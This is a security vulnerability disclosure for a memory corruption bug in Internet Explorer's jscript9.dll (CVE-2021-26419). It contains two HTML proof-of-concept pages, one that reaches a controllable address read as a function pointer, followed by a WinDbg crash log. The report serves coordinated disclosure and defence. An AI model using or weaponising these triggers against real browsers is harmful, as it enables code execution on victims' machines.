Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object

There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.

The following minimal sample is sufficient to trigger the bug:

############################################################

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
  function v4(v5,v6) {
    with ({}) {
      arguments();
    }
  }
  for(var i=0; i <1; i++) v4(1);
}
alert('start');
main();
alert('end');

</script>

############################################################

When this sample is opened with Internet Explorer, it crashes inside jscript9!Js::JavascriptFunction::CallFunction<1> when dereferencing memory pointed to by eax.

jscript9!Js::JavascriptFunction::CallFunction<1>+0x39:
68c2d6e9 8bb850020000    mov     edi,dword ptr [eax+250h] ds:002b:00000250=????????

On the first glance, it might look like a null pointer dereference, however the value of eax in this case was read from uninitialized memory. There are also different ways to trigger the crash when accessing the arguments object. The following sample demonstrates a crash when reading from a controllable address:

############################################################

 <!-- saved from url=(0014)about:internet -->
<script>

function test() {
  test.caller.arguments.length = (0x13371337>>1);
}

function main() {
  function v4(v5,v6) {
    test();
    with ({}) {
      arguments.length;
      arguments();
    }
  }
  for(var i=0; i <1; i++) v4(1);
}
alert('start');
main();
alert('end');

</script>

############################################################

This sample crashes in Js::JavascriptOperators::GetProperty_Internal when dereferencing address 0x13371337+40h:

jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35:
68b578b5 8b7840          mov     edi,dword ptr [eax+40h] ds:002b:13371377=????????

The value read this way is used as a function pointer, thus demonstrating the vulnerability could be used for code execution.

I haven't done the full root cause analysis (it will be easier to do with proper debug tooling for jscript9), but in both cases, the operations on 'arguments' object end up being performed on incorrect data. I suspect this is related to changing the scope, e.g. accessing an object at an incorrect stack slot due to scope change. Another possibility could be an incorrectly initialized arguments object or the corresponding local variable.

Full debug log:

############################################################

(1654.14e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=13371337 ebx=0910bbe0 ecx=0910bbe0 edx=0910bbe0 esi=092b8240 edi=00000000
eip=68b578b5 esp=053bc578 ebp=053bc590 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35:
68b578b5 8b7840          mov     edi,dword ptr [eax+40h] ds:002b:13371377=????????

0:009> k
 # ChildEBP RetAddr  
00 053bc590 68b69075 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35
01 053bc5dc 68b9d19d jscript9!Js::InterpreterStackFrame::OP_ProfiledLdLen<Js::OpLayoutReg2_OneByte>+0x1f5
02 053bc608 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x7fd
03 053bc744 0b9a0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
WARNING: Frame IP not in any known module. Following frames may be wrong.
04 053bc750 68c2d743 0xb9a0fd9
05 053bc798 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
06 053bc7c8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121
07 053bc7f8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3
08 053bc934 0b9a0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
09 053bc940 68c2d743 0xb9a0fe1
0a 053bc988 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
0b 053bc9b8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121
0c 053bc9e8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3
0d 053bcb14 0b9a0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
0e 053bcb20 68c2d743 0xb9a0fe9
0f 053bcb60 68b4eca9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
10 053bcbd4 68b4ebbc jscript9!Js::JavascriptFunction::CallRootFunctionInternal+0xb5
11 053bcc2c 68b4eb56 jscript9!Js::JavascriptFunction::CallRootFunction+0x4d
12 053bcc74 68b4eabd jscript9!ScriptSite::CallRootFunction+0x42
13 053bccb0 68b5256e jscript9!ScriptSite::Execute+0xae
14 053bcd48 68b4e9aa jscript9!ScriptEngine::ExecutePendingScripts+0x1bf
15 053bcde0 68c27cca jscript9!ScriptEngine::ParseScriptTextCore+0x32c
16 053bce30 695a9cc1 jscript9!ScriptEngine::ParseScriptText+0x5a
17 053bce68 694a0493 MSHTML!InitializeLocalHtmlEngine+0x1f11
18 053bcec0 694b7fe7 MSHTML!GetWebPlatformObject+0x16c93
19 053bcf30 694b8493 MSHTML!GetWebPlatformObject+0x2e7e7
1a 053bd01c 694b87be MSHTML!GetWebPlatformObject+0x2ec93
1b 053bd098 694b8146 MSHTML!GetWebPlatformObject+0x2efbe
1c 053bd0b8 694d79d9 MSHTML!GetWebPlatformObject+0x2e946
1d 053bd110 694d6bb9 MSHTML!UninitializeLocalHtmlEngine+0x8b49
1e 053bd134 694d653e MSHTML!UninitializeLocalHtmlEngine+0x7d29
1f 053bd25c 695d4891 MSHTML!UninitializeLocalHtmlEngine+0x76ae
20 053bd27c 695d47fb MSHTML!DllGetClassObject+0x7291
21 053bd29c 695d478d MSHTML!DllGetClassObject+0x71fb
22 053bd2e8 695d46a7 MSHTML!DllGetClassObject+0x718d
23 053bd300 6950dccc MSHTML!DllGetClassObject+0x70a7
24 053bd378 6967d357 MSHTML!TravelLogCreateInstance+0x25cec
25 053bd3c8 69510f32 MSHTML!DllCanUnloadNow+0x13957
26 053bd3e4 76d0ef5b MSHTML!TravelLogCreateInstance+0x28f52
27 053bd410 76d05eca USER32!_InternalCallWinProc+0x2b
28 053bd4f4 76d03c3a USER32!UserCallWinProcCheckWow+0x33a
29 053bd568 76d03a00 USER32!DispatchMessageWorker+0x22a
2a 053bd574 6ad32cd4 USER32!DispatchMessageW+0x10
2b 053bf720 6ad31db3 IEFRAME!Ordinal245+0x1cb4
2c 053bf7e0 6a5bcb2c IEFRAME!Ordinal245+0xd93
2d 053bf7f8 731e26ed msIso+0x1cb2c
2e 053bf830 756cfa29 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
2f 053bf840 770676b4 KERNEL32!BaseThreadInitThunk+0x19
30 053bf89c 77067684 ntdll!RtlGetAppContainerNamedObjectPath+0xe4
31 053bf8ac 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4

############################################################


This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2021-05-13. Disclosure at an earlier date is possible if
agreed upon by all parties.


Related CVE Numbers: CVE-2021-26419.



Found by: ifratric@google.com